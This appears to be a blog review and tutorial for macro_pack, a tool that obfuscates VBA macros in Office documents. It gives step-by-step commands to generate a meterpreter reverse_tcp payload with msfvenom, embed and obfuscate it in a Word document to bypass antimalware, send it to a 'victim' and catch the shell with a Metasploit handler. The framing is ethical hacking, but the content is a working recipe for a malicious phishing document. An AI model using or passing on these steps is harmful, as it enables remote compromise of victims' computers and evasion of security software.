The macro_pack is a tool for automating obfuscation in an MS document or VBS script format It’s perfect for security professionals who want to perform a social engineering attack, to simplify the process of an MS document generation and bypass antimalware solutions.
First, clone the repository from Github. You also need python3 to run the script.
git clone https://github.com/sevagas/macro_pack.git
Then go to the folder and install the requirements.
pip3 install -r requirements.txt
After installing all the missing dependencies, go to the src/ folder and run the script in python.
python3 macro_pack.py --help
An interface appears with all the options you can use. The main goal of this script is automating a time consuming process. So you don’t need to do some sophisticated configuration, all can be done with a single line of code.
So, let’s see a basic example of creating a Microsoft office document with an embedded vba script to open a reverse connection between you and your victim.
First create the payload using msfvenom.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f vba > test.vba
After that all you have to do is to run the script with the right option to obfuscate the document you are gonna create.
python3 macro_pack.py -f test.vba -o -G test.do
That’s it. Your MS document is ready. All you have to do now is to send it to a victim and fire up a metasploit console with a handler.
What Bunny rating does it get?
Macro_pack is very interesting tool, very useful for a security professional. Exploitation, antimalware bypass and automation of the generation of macro and scripts, all these are in this amazing tool. Please give it some time first, play with it to learn it better. This tool is not optional for beginners who don’t know what they are doing. Anyway, great tool, Iam giving it 4.5 out of 5 bunnies.
Want to learn more about ethical hacking?
Do you know of another GitHub related hacking tool?
Get in touch with us via the contact form if you would like us to look at any other GitHub ethical hacking tools.